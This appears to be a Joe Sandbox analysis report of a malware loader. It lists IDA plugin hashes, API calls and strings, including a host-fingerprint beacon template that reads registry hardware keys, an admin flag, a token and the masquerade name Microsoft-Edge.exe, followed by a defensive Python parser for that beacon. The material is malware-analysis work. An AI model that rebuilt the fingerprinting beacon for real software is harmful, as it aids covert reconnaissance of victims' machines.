                                                                                                                                                                  • Opcode Fuzzy Hash: fd94ec257c4ef1f8f79f991d1e00500fec44af56488bef84bd532ff6f6f00b4c
                                                                                                                                                                  • Instruction Fuzzy Hash: 12C22A71E086688FDB35CE28DD807E9B7B5EB88305F1441EAD85EA7240E775AF858F40
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                                                                                                                                                  • Instruction ID: 0a3619b6f9b28251f74e96c092945c8c3b56f75a32eef69ccae1815cddc35dfe
                                                                                                                                                                  • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF13E71E006199FDF24CFA9C9C06ADB7B1FF48314F158269E825AB345D731AE45CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00C3CE82,?,?,?,?,00C3CEB7,?,?,?,?,?,?,00C3C42D,?,00000001), ref: 00C3CB33
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$FilePreciseSystem
• String ID:
• API String ID: 1802150274-0
• Opcode ID: 898d4d5f811a73da8fb3da5e1f500540fba2558353d45b7e90cf1a6112bbbd6c
• Instruction ID: 0f1a00491a1efc5f47303027fdb4e6ef491245013f506c9664500fa17c2b0d94
• Opcode Fuzzy Hash: 898d4d5f811a73da8fb3da5e1f500540fba2558353d45b7e90cf1a6112bbbd6c
• Instruction Fuzzy Hash: E7D0223251203893CB012B90AC05AADFB089B04B98B000211E808772208A527C804BD4
Strings
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
• Instruction ID: a78ab78ad72cb5272ad00d125b3ca256b4b604d580073614d78f2896fcce820b
• Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
• Instruction Fuzzy Hash: 4051B77C20C7085ECB388A29A9977BE67AA9F11303F140759DC62D7682CA919FCD830D
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9721f977c2abd6bd1eff58899882101b6a901d4b3c04a5efd4731ce4d06e80cf
• Instruction ID: 7da1b48fe6c902f8e09a6a6077a54a48d28192610a43aa81c5cf53aa62db1614
• Opcode Fuzzy Hash: 9721f977c2abd6bd1eff58899882101b6a901d4b3c04a5efd4731ce4d06e80cf
• Instruction Fuzzy Hash: 1F2260B7F515144BDB0CCA9DDCA27ECB2E3AFD8214B0E803DA40AE3745EA79D9158648
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61dbe23a8cb5075cc6623244d5cb0775d271411da62d9cb74a5699477b867391
• Instruction ID: 5e4d989ffacb8156d17613c524362af5023c9387a4d419f313a946476c98d6f3
• Opcode Fuzzy Hash: 61dbe23a8cb5075cc6623244d5cb0775d271411da62d9cb74a5699477b867391
• Instruction Fuzzy Hash: AEB15071214609DFD725CF28C4C6B557BE0FF45368F258A59E8A9CF2A1C335EA92CB40
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a6cd191248b5dedb74facfb1e9752c208f291c7f907ea9830650b022f8fe8f1b
• Instruction ID: 9bd3a6b566615e0fd8a2e9a33bed8194b69d81d7ad2b3c594ee0c31573577546
• Opcode Fuzzy Hash: a6cd191248b5dedb74facfb1e9752c208f291c7f907ea9830650b022f8fe8f1b
• Instruction Fuzzy Hash: 1851C47060C7918FD319CF2D911563AFFE1AFD5200F084A9EE5EA87292D774DA48CB92
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3bf1a94b001a5beb3a10f1747235f861172df8f6d0d4fcf8dbd3b3be94ac1ee4
                                                                                                                                                                  • Instruction ID: afe64b84236f7cdf7f770c99a97239a2b472b509ceba90afebb297b911a4cd13
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bf1a94b001a5beb3a10f1747235f861172df8f6d0d4fcf8dbd3b3be94ac1ee4
                                                                                                                                                                  • Instruction Fuzzy Hash: 3321B673F204394B770CC47E8C572BDB6E1C68C541745423AE8A6EA2C1D968D917E2E4
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d62d6cca0dcba2ea49fac5bb9225e02c238427e4856f01b078fa5b10a79b91c
• Instruction ID: 4c2551e69b1563937a0358174183c67ffbcd52122c1b3c31ddff498dd13eaaae
• Opcode Fuzzy Hash: 1d62d6cca0dcba2ea49fac5bb9225e02c238427e4856f01b078fa5b10a79b91c
• Instruction Fuzzy Hash: 1711A723F30C255A675C816D8C132BAA1D2DBD824031F433AD826E7284E9A4DE23D290
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction ID: d8296728458f540f8633fd832d87abb51ea66819bc510b1c6c42a76293764469
• Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction Fuzzy Hash: B2112B7B20014147DA348A3DD9F45B6A796EBC5321B3D437AF1614B758DE22EB4DD900
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a255e47e6232ddaafb0a524983f725e14c1b0db7e70cf411b4167870621d2da4
• Instruction ID: 2896380daeec0b0adfe40947365021b62682e70e40716b61c7cc05827bf5bc0a
• Opcode Fuzzy Hash: a255e47e6232ddaafb0a524983f725e14c1b0db7e70cf411b4167870621d2da4
• Instruction Fuzzy Hash: 07E08C35190A48AFDF29BF18C898D593B9AEB51346F409800FC144B621CF76FED1EA84
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
• Instruction ID: 9f09c5b824e9af18d19086f76f3d4feb08bbdd56eda6ade4f066b1d5bf958752
• Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
• Instruction Fuzzy Hash: A2E04636911628EBCB15DB89890498AF6ACEB48B01F154196B901E3240C270DF44D7D8
APIs
• _ValidateLocalCookies.LIBCMT ref: 00C547A7
• ___except_validate_context_record.LIBVCRUNTIME ref: 00C547AF
• _ValidateLocalCookies.LIBCMT ref: 00C54838
• __IsNonwritableInCurrentImage.LIBCMT ref: 00C54863
• _ValidateLocalCookies.LIBCMT ref: 00C548B8
Strings
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Similarity
• API ID: _wcsrchr
• String ID: .bat$.cmd$.com$.exe
• API String ID: 1752292252-4019086052
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00C27065
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: $VUUU$invalid stoi argument
• API String ID: 909987262-3954507777
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0

Execution Graph

Execution Coverage: 25.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 19.3%
Total number of Nodes: 280
Total number of Limit Nodes: 12

                                                                                                                                                                  Callgraph

[Callgraph rendering omitted. It covers 84 functions, Function_00401010 through Function_00415AFC. Function_004029E7 calls Function_00401C4B, Function_00401550, Function_00402559, Function_00402760, Function_00402C70, Function_0040160A, Function_00402218 and Function_00401B3F; Function_00401730 calls Function_00401677 and Function_00401E9E; Function_00402700 calls Function_00402607 and Function_00401E9E.]

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemInfo.KERNEL32 ref: 00402241
                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0040225E
                                                                                                                                                                    • Part of subcall function 00401FDE: RegOpenKeyExA.KERNEL32 ref: 00402051
                                                                                                                                                                    • Part of subcall function 00401FDE: RegQueryValueExA.KERNEL32 ref: 00402095
                                                                                                                                                                    • Part of subcall function 00401FDE: strncpy.MSVCRT ref: 004020AD
                                                                                                                                                                    • Part of subcall function 00401FDE: RegQueryValueExA.KERNEL32 ref: 004020EC
                                                                                                                                                                    • Part of subcall function 00401FDE: printf.MSVCRT ref: 00402100
                                                                                                                                                                    • Part of subcall function 00401FDE: RegCloseKey.KERNEL32 ref: 00402113
                                                                                                                                                                    • Part of subcall function 00401FDE: atoi.MSVCRT ref: 0040211C
                                                                                                                                                                    • Part of subcall function 00401FDE: strstr.MSVCRT ref: 0040212F
                                                                                                                                                                    • Part of subcall function 00401FDE: strncpy.MSVCRT ref: 00402154
                                                                                                                                                                  • GetComputerNameA.KERNEL32 ref: 004022CA
                                                                                                                                                                  • RegOpenKeyExA.KERNEL32 ref: 00402352
                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 00402394
                                                                                                                                                                  • RegOpenKeyExA.KERNEL32 ref: 0040240F
                                                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 0040244E
                                                                                                                                                                  • sprintf.MSVCRT ref: 00402536
                                                                                                                                                                  • printf.MSVCRT ref: 00402549
                                                                                                                                                                  Strings
                                                                                                                                                                  • true, xrefs: 0040246C
                                                                                                                                                                  • SystemProductName, xrefs: 0040243D
                                                                                                                                                                  • Windows, xrefs: 00402516
                                                                                                                                                                  • Processo, xrefs: 004022D6
                                                                                                                                                                  • x64, xrefs: 00402490
                                                                                                                                                                  • Microsoft-Edge.exe, xrefs: 004024CC
                                                                                                                                                                  • Model, xrefs: 004023B3
                                                                                                                                                                  • Unknown , xrefs: 00402260
                                                                                                                                                                  • { "cpuCores": "%u", "totalMemory": "%llu MB", "platform": "%s", "arch": "%s", "model": "%s", "osVersion": "%s", "processorName": "%s", "systemModel": "%s", "configuration": "%s", "filename": "%s", "admin": "%s", "token": "%s"}, xrefs: 00402528
                                                                                                                                                                  • Unknown , xrefs: 004023A9
                                                                                                                                                                  • false, xrefs: 00402475
                                                                                                                                                                  • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0040233D
                                                                                                                                                                  • ProcessorNameString, xrefs: 00402383
                                                                                                                                                                  • HARDWARE\DESCRIPTION\System\BIOS, xrefs: 004023FA
                                                                                                                                                                  • 5879465914, xrefs: 004024B4
                                                                                                                                                                  • System Info JSON:%s, xrefs: 00402542
                                                                                                                                                                  • x86, xrefs: 00402499
                                                                                                                                                                  • Unknown , xrefs: 004022CC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$Open$printfstrncpy$CloseComputerGlobalInfoMemoryNameStatusSystematoisprintfstrstr
                                                                                                                                                                  • String ID: 5879465914$HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Microsoft-Edge.exe$Model$Processo$ProcessorNameString$System Info JSON:%s$SystemProductName$Unknown $Unknown $Unknown $Windows$false$true$x64$x86${ "cpuCores": "%u", "totalMemory": "%llu MB", "platform": "%s", "arch": "%s", "model": "%s", "osVersion": "%s", "processorName": "%s", "systemModel": "%s", "configuration": "%s", "filename": "%s", "admin": "%s", "token": "%s"}
                                                                                                                                                                  • API String ID: 4029298962-3802587010
                                                                                                                                                                  • Opcode ID: da8525ef243d30c2edf7e48c7b0dd2ac65d971a58a557c0755b9c302740e70be
                                                                                                                                                                  • Instruction ID: 7bbad046644aba7b8c0eebd7a0f359c977efbb6d67af6d4d89ac9c8c1b5c799d
                                                                                                                                                                  • Opcode Fuzzy Hash: da8525ef243d30c2edf7e48c7b0dd2ac65d971a58a557c0755b9c302740e70be
                                                                                                                                                                  • Instruction Fuzzy Hash: AF71ECB2210B8599DB74CF16E8903D933A5F748788F80812ADB9D5BB68EF79C354C748
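The function at 00402218 assembles a host fingerprint with sprintf from the template listed under Strings: CPU count and memory from GetSystemInfo and GlobalMemoryStatusEx, ProcessorNameString and SystemProductName from the two HARDWARE\DESCRIPTION registry keys, the masquerade filename Microsoft-Edge.exe, an admin flag and the token 5879465914. Because the values are dropped into the template raw, a registry string containing a double quote yields malformed JSON. The following parser is an added example written for this report, not code from the sample or from Joe Sandbox; the two beacon strings, the helper names and the host values in them are constructed for illustration.

```python
"""Parse the system-fingerprint beacon that the loader function at 0x00402218
builds with sprintf.  The field layout is the recovered format string; the
sample beacons and helper names below are constructed for this example."""
import json
import re
from typing import Dict, Optional

# Keys in the order they appear in the recovered sprintf template.
BEACON_FIELDS = (
    "cpuCores", "totalMemory", "platform", "arch", "model", "osVersion",
    "processorName", "systemModel", "configuration", "filename", "admin", "token",
)

# The loader inserts raw registry strings (ProcessorNameString, SystemProductName)
# without escaping, so a double quote inside a value breaks strict JSON parsing.
# This regex still recovers the fields: a value ends at the first quote that is
# followed by the next key or by the closing brace.
_FIELD_RE = re.compile(
    r'"(?P<key>[A-Za-z]+)":\s*"(?P<val>.*?)"(?=\s*,\s*"[A-Za-z]+":|\s*\})',
    re.S,
)


def parse_beacon(text: str) -> Optional[Dict[str, str]]:
    """Return the twelve beacon fields as a dict, or None if text is not this beacon."""
    try:
        obj = json.loads(text)
        if isinstance(obj, dict) and all(k in obj for k in BEACON_FIELDS):
            return {k: str(obj[k]) for k in BEACON_FIELDS}
    except ValueError:  # json.JSONDecodeError is a ValueError subclass
        pass
    # Fallback for the unescaped case.
    found = {m.group("key"): m.group("val") for m in _FIELD_RE.finditer(text)}
    if all(k in found for k in BEACON_FIELDS):
        return {k: found[k] for k in BEACON_FIELDS}
    return None


def triage_beacon(fields: Dict[str, str]) -> Dict[str, object]:
    """Reduce a parsed beacon to the facts an analyst acts on."""
    return {
        "elevated": fields["admin"] == "true",
        "arch": fields["arch"],
        "masquerade_name": fields["filename"],  # "Microsoft-Edge.exe" in this sample
        "token": fields["token"],               # "5879465914" in this sample
        "host": f'{fields["processorName"]} / {fields["systemModel"]} / {fields["totalMemory"]}',
    }


# Constructed examples: a well-formed beacon, and one where SystemProductName
# contained a double quote, which makes json.loads fail.
SAMPLE_CLEAN = (
    '{ "cpuCores": "4", "totalMemory": "8191 MB", "platform": "Windows", "arch": "x64", '
    '"model": "Unknown ", "osVersion": "10.0", "processorName": "Intel(R) Core(TM) i5-8250U", '
    '"systemModel": "VirtualBox", "configuration": "Unknown ", "filename": "Microsoft-Edge.exe", '
    '"admin": "false", "token": "5879465914"}'
)
SAMPLE_UNESCAPED = SAMPLE_CLEAN.replace('"VirtualBox"', '"Acme "Pro" Laptop"')

if __name__ == "__main__":
    for sample in (SAMPLE_CLEAN, SAMPLE_UNESCAPED):
        print(triage_beacon(parse_beacon(sample)))
```

Run it over the body of any HTTP POST the sample emits; a hit on the twelve-key layout plus the fixed token is a stronger indicator than the Microsoft-Edge.exe filename alone, since the filename is just the name the loader reports for itself.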

                                                                                                                                                                  Control-flow Graph

